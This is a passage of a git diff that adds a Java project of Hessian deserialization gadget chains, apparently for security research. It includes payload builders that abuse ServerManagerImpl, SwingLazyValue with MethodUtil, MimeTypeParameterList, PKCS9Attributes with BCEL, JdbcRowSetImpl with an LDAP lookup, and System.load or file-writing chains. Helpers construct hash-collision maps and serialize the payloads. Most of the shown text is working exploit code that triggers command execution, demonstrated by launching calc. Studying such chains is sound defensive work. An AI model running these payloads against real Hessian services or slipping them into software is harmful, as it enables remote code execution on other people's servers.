HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错;linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + Object audio = UnsafeTools.getObjectByUnsafe(AudioFileFormat.Type.class); + +// Object xString = UnsafeTools.getObjectByUnsafe(XStringForFSB.class); +// ReflectTools.setFieldValue(xString, "m_strCache", "notNull1"); + + Class aClass = Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry"); + Object conHashMap1 = UnsafeTools.getObjectByUnsafe(aClass); + Object conHashMap2 = UnsafeTools.getObjectByUnsafe(aClass); + ReflectTools.setFieldValue(conHashMap1, "key", audio); + ReflectTools.setFieldValue(conHashMap1, "val", jsonArray); + ReflectTools.setFieldValue(conHashMap2, "key", jsonArray); + ReflectTools.setFieldValue(conHashMap2, "val", audio); + + ConcurrentHashMap finalMap = ReflectTools.makeConcurrentMap(conHashMap1, conHashMap2); + + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java b/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java new file mode 100644 index 0000000..a792e77 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java @@ -0,0 +1,92 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import java.util.AbstractMap; +import java.util.HashMap; + +public class XStringFSB2toString { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错;linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + Object xString = UnsafeTools.getObjectByUnsafe(XStringForFSB.class); +// String unhash = unhash(jsonArray.hashCode()); + ReflectTools.setFieldValue(xString, "m_strCache", "notNull1"); + + // 不知道为什么要包一层 +// Object simple = UnsafeTools.getObjectByUnsafe(AbstractMap.SimpleEntry.class); + // 这里的key 是 final private,但是竟然能直接赋值成功 +// ReflectTools.setFieldValue(simple, "key", jsonArray); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + // 键值不能改,确保hashCode碰撞,才能进入equals + hashMap1.put("zZ", xString); + hashMap1.put("yy", jsonArray); + hashMap2.put("yy", xString); + hashMap2.put("zZ", jsonArray); + + HashMap finalMap = ReflectTools.makeMap(hashMap1, hashMap2); + + return finalMap; + } + + public static String unhash ( int hash ) { + int target = hash; + StringBuilder answer = new StringBuilder(); + if ( target < 0 ) { + // String with hash of Integer.MIN_VALUE, 0x80000000 + answer.append("\u0915\u0009\u001e\u000c\u0002"); + + if ( target == Integer.MIN_VALUE ) + return answer.toString(); + // Find target without sign bit set + target = target & Integer.MAX_VALUE; + } + + unhash0(answer, target); + return answer.toString(); + } + private static void unhash0 ( StringBuilder partial, int target ) { + int div = target / 31; + int rem = target % 31; + + if ( div <= Character.MAX_VALUE ) { + if ( div != 0 ) + partial.append((char) div); + partial.append((char) rem); + } + else { + unhash0(partial, div); + partial.append((char) rem); + } + } +} diff --git a/hessian/src/main/java/com/test/gadget/tmp.java b/hessian/src/main/java/com/test/gadget/tmp.java new file mode 100644 index 0000000..d37b3af --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/tmp.java @@ -0,0 +1,156 @@ +package com.test.gadget; + +import com.alibaba.fastjson.JSONObject; +import com.caucho.hessian.io.Hessian2Input; +import com.caucho.hessian.io.Hessian2Output; +import com.caucho.hessian.io.SerializerFactory; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; + +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import sun.reflect.ReflectionFactory; + +import java.io.*; +import java.lang.reflect.*; +import java.util.HashMap; +import java.util.Random; +import java.util.concurrent.ConcurrentHashMap; + +import static com.sun.org.apache.xalan.internal.xsltc.compiler.Constants.CHARACTERS; + +public class tmp { + public static void main(String[] args) throws Exception { + ServerManagerImpl serverManager = createWithObjectNoArgsConstructor(ServerManagerImpl.class); + HashMap map =new HashMap<>(); + ServerTableEntry serverTableEntry = createWithObjectNoArgsConstructor(ServerTableEntry.class); + map.put(1,serverTableEntry); + + Process process = new ProcessBuilder("cmd", "/c", "calc").start(); + + setFieldValue(serverManager, "serverTable", map); + setFieldValue(serverTableEntry,"state",2); + setFieldValue(serverTableEntry, "process", process); + setFieldValue(serverTableEntry, "activationCmd", "calc"); + + JSONObject jsonObject = new JSONObject(); + jsonObject.put("key", serverManager); + + +// XStringForFSB xStringForFSB = createWithoutConstructor(XStringForFSB.class); +// setFieldValue(xStringForFSB, "m_strCache", generateRandomString()); + Object conEntry = createWithObjectNoArgsConstructor(Class.forName("javax.sound.sampled.AudioFileFormat$Type")); + + + Object conEntry1 = createWithObjectNoArgsConstructor(Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry")); + Object conEntry2 = createWithObjectNoArgsConstructor(Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry")); + setFieldValue(conEntry1, "key", conEntry); + setFieldValue(conEntry1, "val", jsonObject); + setFieldValue(conEntry2, "key", jsonObject); + setFieldValue(conEntry2, "val", conEntry); + ConcurrentHashMap s = new ConcurrentHashMap(); + setFieldValue(s, "sizeCtl", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + setAccessible(nodeCons); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, conEntry1, conEntry1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, conEntry2, conEntry2, null)); + setFieldValue(s, "table", tbl); + Field table = ConcurrentHashMap.class.getDeclaredField("table"); + table.setAccessible(true); + table.set(s, tbl); + + ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); + Hessian2Output out = new Hessian2Output(byteArrayOutputStream); + + SerializerFactory sf = new SerializerFactory(); + sf.setAllowNonSerializable(true); + out.setSerializerFactory(sf); + out.writeObject(s); + out.flush(); + ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray()); + new Hessian2Input(byteArrayInputStream).readObject(); + } + + public static void Serialize(Object obj) throws IOException { + ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin")); + objectOutputStream.writeObject(obj); + + } + + public static Object Unserialize(String Filename) throws IOException,ClassNotFoundException{ + + ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename)); + Object obj = objectInputStream.readObject(); + return obj; + + } + public static String generateRandomString() { + Random random = new Random(); + int length = random.nextInt(20)+1; + StringBuilder sb = new StringBuilder(length); + + for (int i = 0; i < length; i++) { + int index = random.nextInt(CHARACTERS.length()); + char randomChar = CHARACTERS.charAt(index); + sb.append(randomChar); + } + + return sb.toString(); + } + public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + field.set(obj, value); + } + public static T createWithoutConstructor ( Class classToInstantiate ) + throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); + } + public static T createWithObjectNoArgsConstructor(Class clzToInstantiate) { + + T resObject = null; + try{ + resObject = createWithConstructor(clzToInstantiate, Object.class, new Class[0], new Object[0]); + } catch (NoSuchMethodException | InstantiationException | IllegalAccessException | InvocationTargetException e) { + } + + return resObject; + } + public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) + throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + setAccessible(objCons); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + setAccessible(sc); + return (T)sc.newInstance(consArgs); + } + public static Field getField(final Class clazz, final String fieldName) { + Field field = null; + try { + field = clazz.getDeclaredField(fieldName); + setAccessible(field); + } + catch (NoSuchFieldException ex) { + if (clazz.getSuperclass() != null) + field = getField(clazz.getSuperclass(), fieldName); + } + return field; + } + public static void setAccessible(AccessibleObject member) { + String versionStr = System.getProperty("java.version"); + int javaVersion = Integer.parseInt(versionStr.split("\\.")[0]); + + // not possible to quiet runtime warnings anymore... + // see https://bugs.openjdk.java.net/browse/JDK-8210522 + // to understand impact on Permit (i.e. it does not work + // anymore with Java >= 12) + member.setAccessible(true); + } +} + diff --git a/hessian/src/main/java/com/test/gadget/tmp1.java b/hessian/src/main/java/com/test/gadget/tmp1.java new file mode 100644 index 0000000..a905790 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/tmp1.java @@ -0,0 +1,27 @@ +package com.test.gadget; + +import com.sun.rowset.JdbcRowSetImpl; +import com.sun.syndication.feed.impl.EqualsBean; +import tools.ReflectTools; + +import java.util.HashMap; + +public class tmp1 { + public static void main(String[] args) throws Exception { + JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); + jdbcRowSet.setDataSourceName("ldap://127.0.0.1:50389/2d4ade"); + EqualsBean equalsBean = new EqualsBean(JdbcRowSetImpl.class, jdbcRowSet); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + hashMap1.put("zZ", equalsBean); + hashMap1.put("yy", jdbcRowSet); + hashMap2.put("zZ", jdbcRowSet); + hashMap2.put("yy", equalsBean); + + HashMap finalMap = ReflectTools.makeMap(hashMap2, hashMap1); + + byte[] bytes = ReflectTools.ser2bytes(finalMap); + ReflectTools.deser(bytes, null); + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java b/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java new file mode 100644 index 0000000..ad4a5a8 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java @@ -0,0 +1,10 @@ +package com.test.gadget.toStringBased; + +import java.io.IOException; + +public class BCELClass { + public static void _main(String[] args) throws IOException { + System.out.println("evil _main"); + Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", "calc"}); + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java b/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java new file mode 100644 index 0000000..17436b0 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java @@ -0,0 +1,37 @@ +package com.test.gadget.toStringBased; + +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; + +import javax.swing.*; +import java.lang.reflect.Method; +import java.rmi.server.UID; +import java.util.HashMap; + +public class HashTableEquals_get { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Method exec = Runtime.class.getDeclaredMethod("exec", String[].class); + Method invokeMethod = Class.forName("sun.reflect.misc.MethodUtil").getDeclaredMethod("invoke", Method.class, Object.class, Object[].class); + // 不能直接传入Runtime,会找不到方法,因为要求参数类型为Object + // hessian>=60最终不能调Runtime,因为反序列化后Runtime变成HashMap了 + SwingLazyValue swingLazyValue = new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", + new Object[]{invokeMethod, new Object(), new Object[]{exec, Runtime.getRuntime(), new Object[]{new String[]{"cmd.exe","/c","calc"}}}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", swingLazyValue); + + UIDefaults uiDefaults1 = new UIDefaults(); + uiDefaults1.put("1diot9", swingLazyValue); + + HashMap hashMap = ReflectTools.makeMap(uiDefaults, uiDefaults1); + + return hashMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java new file mode 100644 index 0000000..0702e2d --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java @@ -0,0 +1,36 @@ +package com.test.gadget.toStringBased; + +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; + +import javax.activation.MimeTypeParameterList; +import javax.swing.*; +import java.io.IOException; +import java.lang.reflect.Method; + +public class MimeTypeParameterList_MethodUtil { + public static void main(String[] args) throws NoSuchMethodException, IllegalAccessException, IOException, ClassNotFoundException { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2ToStringSer(payload); + HessianTools.hessian2Deser(bytes); + } + + + public static Object getPayload() throws NoSuchMethodException, IllegalAccessException, ClassNotFoundException { + Method exec = Runtime.class.getDeclaredMethod("exec", String[].class); + Method invokeMethod = Class.forName("sun.reflect.misc.MethodUtil").getDeclaredMethod("invoke", Method.class, Object.class, Object[].class); + // 不能直接传入Runtime,会找不到方法,因为要求参数类型为Object + // hessian>=60最终不能调Runtime,因为反序列化后Runtime变成HashMap了 + SwingLazyValue swingLazyValue = new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", + new Object[]{invokeMethod, new Object(), new Object[]{exec, Runtime.getRuntime(), new Object[]{new String[]{"cmd.exe","/c","calc"}}}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", swingLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java new file mode 100644 index 0000000..16be253 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java @@ -0,0 +1,57 @@ +package com.test.gadget.toStringBased; + +import jdk.nashorn.internal.runtime.ScriptEnvironment; +import jdk.nashorn.internal.runtime.logging.DebugLogger; +import tools.HessianTools; +import tools.IOTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.activation.MimeTypeParameterList; +import javax.swing.*; + +public class MimeTypeParameterList_ProxyLazyValue_Sysload { + public static void main(String[] args) throws Exception { +// Object payload = writeFilePayload(); +// byte[] bytes = HessianTools.hessian2ToStringSer(payload); +// HessianTools.hessian2Deser(bytes); + + Object o = sysLoadPayload(); + byte[] bytes1 = HessianTools.hessian2ToStringSer(o); + HessianTools.hessian2Deser(bytes1); + } + + public static Object writeFilePayload() throws Exception { + Object scriptenv = UnsafeTools.getObjectByUnsafe(ScriptEnvironment.class); + ReflectTools.setFieldValue(scriptenv, "_print_code", false); + ReflectTools.setFieldValue(scriptenv, "_dest_dir", "D:/"); + + Object debug = UnsafeTools.getObjectByUnsafe(DebugLogger.class); + byte[] bytes = IOTools.readFile("D:/1tmp/gcc/dynamic.dll"); + + UIDefaults.ProxyLazyValue proxyLazyValue = new UIDefaults.ProxyLazyValue("jdk.nashorn.internal.codegen.DumpBytecode", "dumpBytecode", new Object[]{scriptenv, debug, bytes, "test"}); + ReflectTools.setFieldValue(proxyLazyValue, "acc", null); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", proxyLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } + + public static Object sysLoadPayload() throws Exception { + + UIDefaults.ProxyLazyValue proxyLazyValue = new UIDefaults.ProxyLazyValue("java.lang.System", "load", new Object[]{"D:/test.class"}); + ReflectTools.setFieldValue(proxyLazyValue, "acc", null); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", proxyLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java b/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java new file mode 100644 index 0000000..726abfd --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java @@ -0,0 +1,38 @@ +package com.test.gadget.toStringBased; + +import com.sun.org.apache.bcel.internal.Repository; +import com.sun.org.apache.bcel.internal.classfile.JavaClass; +import com.sun.org.apache.bcel.internal.classfile.Utility; +import com.sun.org.apache.bcel.internal.util.ClassPath; +import sun.security.pkcs.PKCS9Attribute; +import sun.security.pkcs.PKCS9Attributes; +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.swing.*; +import java.io.IOException; + +public class PKCS9_BCEL { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2ToStringSer(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + JavaClass javaClass = Repository.lookupClass(BCELClass.class); + String bcel = "$$BCEL$$" + Utility.encode(javaClass.getBytes(), true); + + SwingLazyValue swingLazyValue = new SwingLazyValue("com.sun.org.apache.bcel.internal.util.JavaWrapper", "_main", new Object[]{new String[]{bcel}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put(PKCS9Attribute.EMAIL_ADDRESS_OID, swingLazyValue); + + Object PKCS9s = UnsafeTools.getObjectByUnsafe(PKCS9Attributes.class); + ReflectTools.setFieldValue(PKCS9s, "attributes", uiDefaults); + + return PKCS9s; + } +} diff --git a/hessian/src/main/java/com/test/pojo/Person.java b/hessian/src/main/java/com/test/pojo/Person.java new file mode 100644 index 0000000..1f1a6e8 --- /dev/null +++ b/hessian/src/main/java/com/test/pojo/Person.java @@ -0,0 +1,29 @@ +package com.test.pojo; + +import java.io.Serializable; + +public class Person implements Serializable { + private int id; + private String name; + + public Person(int id, String name) { + this.id = id; + this.name = name; + } + + public int getId() { + return id; + } + + public void setId(int id) { + this.id = id; + } + + public String getName() { + return name; + } + + public void setName(String name) { + this.name = name; + } +} diff --git a/hessian/src/main/java/com/test/server/HessianServiceImpl.java b/hessian/src/main/java/com/test/server/HessianServiceImpl.java new file mode 100644 index 0000000..b439ee7 --- /dev/null +++ b/hessian/src/main/java/com/test/server/HessianServiceImpl.java @@ -0,0 +1,13 @@ +package com.test.server; + +import com.caucho.hessian.server.HessianServlet; + +import javax.servlet.annotation.WebServlet; + +@WebServlet(name = "hessian", value = "/hessian") +public class HessianServiceImpl extends HessianServlet implements Service { + @Override + public String getCurrentTime() { + return "test time: 1970/01/01"; + } +} diff --git a/hessian/src/main/java/com/test/server/Service.java b/hessian/src/main/java/com/test/server/Service.java new file mode 100644 index 0000000..59934b9 --- /dev/null +++ b/hessian/src/main/java/com/test/server/Service.java @@ -0,0 +1,5 @@ +package com.test.server; + +public interface Service { + public String getCurrentTime(); +} diff --git a/hessian/src/main/java/tools/ClassByteGen.java b/hessian/src/main/java/tools/ClassByteGen.java new file mode 100644 index 0000000..0a0f32a --- /dev/null +++ b/hessian/src/main/java/tools/ClassByteGen.java @@ -0,0 +1,29 @@ +package tools; + +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtConstructor; + +public class ClassByteGen { + public static byte[] getBytes(String code, String className) throws Exception { + String Abstract = "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"; + ClassPool pool = ClassPool.getDefault(); + pool.importPackage(Abstract); + pool.importPackage("java.io"); + pool.importPackage("java.nio.file"); + pool.importPackage("java.lang.reflect"); + pool.importPackage("java.nio.charset"); + pool.importPackage("java.util"); + pool.insertClassPath(Abstract); +// pool.insertClassPath("java.nio"); + CtClass ctClass = pool.makeClass(className); + ctClass.setSuperclass(pool.get(Abstract)); +// CtConstructor ctConstructor = ctClass.makeClassInitializer(); +// ctConstructor.setBody(code); + CtConstructor ctConstructor1 = new CtConstructor(new CtClass[]{}, ctClass); + ctConstructor1.setBody(code); + ctClass.addConstructor(ctConstructor1); + ctClass.writeFile("ClassByteGen"); + return ctClass.toBytecode(); + } +} diff --git a/hessian/src/main/java/tools/HessianTools.java b/hessian/src/main/java/tools/HessianTools.java new file mode 100644 index 0000000..2875d1c --- /dev/null +++ b/hessian/src/main/java/tools/HessianTools.java @@ -0,0 +1,66 @@ +package tools; + +import com.caucho.hessian.io.*; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.IOException; + +public class HessianTools { + public static byte[] hessian2ToStringSer(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + baos.write(67); + Hessian2Output hessian2Output = new Hessian2Output(baos); + + SerializerFactory serializerFactory = new SerializerFactory(); + serializerFactory.setAllowNonSerializable(true); + hessian2Output.setSerializerFactory(serializerFactory); + + hessian2Output.writeObject(obj); + hessian2Output.close(); + return baos.toByteArray(); + } + + + public static byte[] hessian2Ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + Hessian2Output hessian2Output = new Hessian2Output(baos); + + SerializerFactory serializerFactory = new SerializerFactory(); + serializerFactory.setAllowNonSerializable(true); + hessian2Output.setSerializerFactory(serializerFactory); + + hessian2Output.writeObject(obj); + hessian2Output.close(); + return baos.toByteArray(); + } + + public static Object hessian2Deser(byte[] bytes) throws IOException { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + Hessian2Input hessian2Input = new Hessian2Input(bais); + Object o = hessian2Input.readObject(); + hessian2Input.close(); + return o; + } + + public static byte[] hessianSer2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + HessianOutput hessianOutput = new HessianOutput(baos); + + SerializerFactory serializerFactory = new SerializerFactory(); + serializerFactory.setAllowNonSerializable(true); + hessianOutput.setSerializerFactory(serializerFactory); + + hessianOutput.writeObject(obj); + hessianOutput.close(); + return baos.toByteArray(); + } + + public static Object hessianDeser(byte[] bytes) throws IOException { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + HessianInput hessianInput = new HessianInput(bais); + Object o = hessianInput.readObject(); + hessianInput.close(); + return o; + } +} diff --git a/hessian/src/main/java/tools/IOTools.java b/hessian/src/main/java/tools/IOTools.java new file mode 100644 index 0000000..46d0567 --- /dev/null +++ b/hessian/src/main/java/tools/IOTools.java @@ -0,0 +1,12 @@ +package tools; + +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class IOTools { + public static byte[] readFile(String fileName) throws IOException { + byte[] bytes = Files.readAllBytes(Paths.get(fileName)); + return bytes; + } +} diff --git a/hessian/src/main/java/tools/InvocationHandlerImpl.java b/hessian/src/main/java/tools/InvocationHandlerImpl.java new file mode 100644 index 0000000..7c15d95 --- /dev/null +++ b/hessian/src/main/java/tools/InvocationHandlerImpl.java @@ -0,0 +1,19 @@ +package tools; + +import java.io.Serializable; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Method; + +// 动态代理,实现对象接口转化 +public class InvocationHandlerImpl implements InvocationHandler, Serializable { + private Object object; + + public InvocationHandlerImpl(Object obj) { + this.object = obj; + } + + @Override + public Object invoke(Object proxy, Method method, Object[] args) throws Throwable { + return null; + } +} diff --git a/hessian/src/main/java/tools/Payload.java b/hessian/src/main/java/tools/Payload.java new file mode 100644 index 0000000..5396724 --- /dev/null +++ b/hessian/src/main/java/tools/Payload.java @@ -0,0 +1,10 @@ +package tools; + +public abstract class Payload { +// public Templates getTemplates(byte[] byteCode, String bytePath) throws Exception { +// Templates templates = TemplatesGen.getTemplates(byteCode, bytePath); +// return templates; +// } + + public abstract String getPayload(byte[] byteCode, String bytePath) throws Exception; +} diff --git a/hessian/src/main/java/tools/ReflectTools.java b/hessian/src/main/java/tools/ReflectTools.java new file mode 100644 index 0000000..f8e30a9 --- /dev/null +++ b/hessian/src/main/java/tools/ReflectTools.java @@ -0,0 +1,200 @@ +package tools; + +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtField; + +import java.io.*; +import java.lang.reflect.Array; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.Modifier; +import java.util.Base64; +import java.util.HashMap; +import java.util.concurrent.ConcurrentHashMap; + +public class ReflectTools { + public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { + Class aClass = obj.getClass(); + Field field = null; + while (aClass != null){ + try { + field = aClass.getDeclaredField(fieldName); + break; + } catch (NoSuchFieldException e) { + aClass = aClass.getSuperclass(); + } + } + field.setAccessible(true); + field.set(obj, value); + } + + // 修改static final 字段 + public static void setFinalField(Object object, String fieldName, Object newValue) throws Exception { + // 获取指定类的 Class 对象 + Class clazz = object.getClass(); + + // 获取 private final 字段 + Field field = clazz.getDeclaredField(fieldName); + + // 使私有字段可以访问 + field.setAccessible(true); + + // 移除 final 修饰符 + Field modifiersField = Field.class.getDeclaredField("modifiers"); + modifiersField.setAccessible(true); + modifiersField.setInt(field, field.getModifiers() & ~java.lang.reflect.Modifier.FINAL); + + // 修改字段的值 + field.set(object, newValue); + } + + public static Object getFieldValue(Object obj, String fieldName) throws NoSuchFieldException, IllegalAccessException { + Class aClass = obj.getClass(); + + while (aClass != null){ + try{ + Field declaredField = aClass.getDeclaredField(fieldName); + declaredField.setAccessible(true); + return declaredField.get(obj); + }catch(NoSuchFieldException e){ + aClass = aClass.getSuperclass(); + } + } + return null; + } + + public static HashMap makeMap (Object v1, Object v2 ) throws Exception { + HashMap s = new HashMap<>(); + setFieldValue(s, "size", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.HashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.HashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); + setFieldValue(s, "table", tbl); + return s; + } + + // 制作hash冲突map,实现调用called.equals(param) + public static HashMap makeEqualMap(Object called, Object param) throws Exception { + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + hashMap1.put("zZ", called); + hashMap1.put("yy", param); + hashMap2.put("zZ", param); + hashMap2.put("yy", called); + + HashMap finalMap = makeMap(hashMap2, hashMap1); + + return finalMap; + } + + public static ConcurrentHashMap makeConcurrentMap (Object v1, Object v2 ) throws Exception { + ConcurrentHashMap s = new ConcurrentHashMap(); + setFieldValue(s, "sizeCtl", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); + setFieldValue(s, "table", tbl); + Field table = ConcurrentHashMap.class.getDeclaredField("table"); + table.setAccessible(true); + table.set(s, tbl); + + return s; + } + + // 生成不继承Serializable接口的Class,防止因suid不一样报错 + public static Class makeClass(String className, String suid) throws ClassNotFoundException, CannotCompileException { + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = pool.makeClass(className); + + if (suid != null) { + // 添加 serialVersionUID 字段并指定其值 + CtField serialVersionUIDField = new CtField(CtClass.longType, "serialVersionUID", ctClass); + serialVersionUIDField.setModifiers(Modifier.PRIVATE | Modifier.STATIC | Modifier.FINAL); // 设置为private static final + ctClass.addField(serialVersionUIDField, suid); // 设置 serialVersionUID 值为 1L + } + + Class aClass = ctClass.toClass(); + return aClass; + } + + // 用于在HashMap中制造hash碰撞,从而触发equals,用于XString系列的equals触发;有时会失败,如XBean链,原因未知 + public static String unhash ( int hash ) { + int target = hash; + StringBuilder answer = new StringBuilder(); + if ( target 